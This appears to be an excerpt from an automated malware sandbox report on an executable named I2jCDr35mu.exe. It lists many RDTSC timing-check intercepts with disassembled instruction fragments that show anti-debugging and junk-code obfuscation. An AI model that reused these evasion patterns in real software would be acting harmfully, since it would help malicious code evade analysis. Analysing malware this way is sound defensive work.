                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A557 second address: 000000000032A55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A55C second address: 000000000032A562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A562 second address: 000000000032A566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A566 second address: 000000000016F99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and edi, dword ptr [ebp+122D1BC9h] 0x0000000f push dword ptr [ebp+122D0FD1h] 0x00000015 add dword ptr [ebp+122D34CCh], edx 0x0000001b mov edi, 46D3C5EDh 0x00000020 call dword ptr [ebp+122D2E8Ah] 0x00000026 pushad 0x00000027 pushad 0x00000028 or edx, 3C219123h 0x0000002e and eax, dword ptr [ebp+122D3885h] 0x00000034 popad 0x00000035 mov dword ptr [ebp+122D2E6Ah], ebx 0x0000003b xor eax, eax 0x0000003d jmp 00007F7E954D64B3h 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 mov dword ptr [ebp+122D2D51h], ecx 0x0000004c mov dword ptr [ebp+122D38B1h], eax 0x00000052 cld 0x00000053 mov esi, 0000003Ch 0x00000058 cmc 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d jmp 00007F7E954D64B8h 0x00000062 lodsw 0x00000064 jmp 00007F7E954D64B5h 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F7E954D64B4h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 cld 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A981 second address: 000000000032A987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A987 second address: 000000000032A98D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032AEE9 second address: 000000000032AEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032AEEF second address: 000000000032AF33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, dword ptr [ebp+122D36FDh] 0x00000014 push 0000001Eh 0x00000016 mov edi, dword ptr [ebp+122D3641h] 0x0000001c nop 0x0000001d jmp 00007F7E954D64B3h 0x00000022 push eax 0x00000023 pushad 0x00000024 jo 00007F7E954D64A8h 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032B30E second address: 000000000032B32E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F7E95375D00h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000356548 second address: 0000000000356555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007F7E954D64B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000356555 second address: 000000000035655F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E95375CF6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035655F second address: 000000000035658D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jns 00007F7E954D64A8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7E954D64AAh 0x0000001b jmp 00007F7E954D64ACh 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035658D second address: 0000000000356591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000356591 second address: 000000000035659D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035659D second address: 00000000003565A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000356F66 second address: 0000000000356F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000356F6C second address: 0000000000356F79 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035A78F second address: 000000000035A7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E954D64A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F7E954D64AEh 0x00000013 push eax 0x00000014 pop eax 0x00000015 jno 00007F7E954D64A6h 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035A7AA second address: 000000000035A7AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035A7AF second address: 000000000035A7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035EC06 second address: 000000000035EC0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035EC0C second address: 000000000035EC18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F7E954D64A6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035E95A second address: 000000000035E960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035F5CE second address: 000000000035F5FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F7E954D64A6h 0x00000009 jg 00007F7E954D64A6h 0x0000000f popad 0x00000010 push ecx 0x00000011 jns 00007F7E954D64A6h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jl 00007F7E954D64AAh 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pushad 0x00000024 popad 0x00000025 jno 00007F7E954D64A8h 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035F79D second address: 000000000035F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035F7A6 second address: 000000000035F7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035FBE9 second address: 000000000035FBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D2A8C second address: 00000000002D2A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000367FB1 second address: 0000000000367FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000367FB5 second address: 0000000000367FBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036B2E9 second address: 000000000036B303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036B303 second address: 000000000036B31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64B8h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036B31F second address: 000000000036B35E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D08h 0x00000007 jmp 00007F7E95375CFCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7E95375D03h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036B4DE second address: 000000000036B506 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E954D64A6h 0x00000008 jnp 00007F7E954D64A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F7E954D64B2h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036B506 second address: 000000000036B53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007F7E95375CF6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jp 00007F7E95375CFEh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036B53F second address: 000000000036B543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036DB1C second address: 000000000036DB28 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7E95375CF6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000036DB28 second address: 000000000036DB56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F7E954D64A6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F7E954D64B9h 0x00000012 jne 00007F7E954D64A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000037216F second address: 0000000000372173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000372400 second address: 0000000000372406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000372406 second address: 0000000000372411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000372411 second address: 0000000000372417 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032AD2B second address: 000000000032AD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D09h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032AD49 second address: 000000000032AD6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64B9h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032AD6D second address: 000000000032ADDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E95375D0Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sbb ecx, 20A2979Ah 0x00000011 push eax 0x00000012 push esi 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F7E95375CF8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 movzx edx, di 0x00000034 jmp 00007F7E95375D01h 0x00000039 push eax 0x0000003a jbe 00007F7E95375CFEh 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000037A802 second address: 000000000037A819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000381E56 second address: 0000000000381E80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7E95375D01h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000381E80 second address: 0000000000381E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64B0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000381E96 second address: 0000000000381E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000381FFD second address: 0000000000382001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000382001 second address: 000000000038201A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D03h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038201A second address: 000000000038201F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038201F second address: 000000000038202B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7E95375CF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003829CF second address: 00000000003829D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7E954D64A6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003829D9 second address: 00000000003829DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003829DD second address: 00000000003829F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7E954D64AEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003829F6 second address: 00000000003829FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000382C8F second address: 0000000000382C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000382C93 second address: 0000000000382CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F7E95375CFAh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000382CA5 second address: 0000000000382CAF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E954D64B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000382CAF second address: 0000000000382CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E95375CF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000382CBD second address: 0000000000382CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E6CC2 second address: 00000000002E6CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E6CC8 second address: 00000000002E6CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E6CCC second address: 00000000002E6CD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038B816 second address: 000000000038B81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038B81E second address: 000000000038B862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F7E95375D03h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007F7E95375CF6h 0x00000015 js 00007F7E95375CF6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7E95375D05h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038B862 second address: 000000000038B88B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F7E954D64B7h 0x00000008 js 00007F7E954D64A6h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F7E954D64A6h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038B88B second address: 000000000038B891 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038B9EF second address: 000000000038B9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038BCDB second address: 000000000038BCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7E95375CF6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000038BFE2 second address: 000000000038BFEF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000390B8C second address: 0000000000390BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F7E95375CF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7E95375D04h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000398844 second address: 000000000039884A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039884A second address: 000000000039884E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039884E second address: 0000000000398854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000397099 second address: 000000000039709F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039709F second address: 00000000003970A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000397FC7 second address: 0000000000397FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000397FCB second address: 0000000000397FDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000397FDF second address: 0000000000397FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7E95375D04h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000397FFB second address: 0000000000397FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F814 second address: 000000000039F82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E95375D03h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F82D second address: 000000000039F831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000039F20C second address: 000000000039F23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7E95375CF6h 0x0000000a popad 0x0000000b jmp 00007F7E95375CFFh 0x00000010 pushad 0x00000011 jnp 00007F7E95375CF6h 0x00000017 jmp 00007F7E95375CFFh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
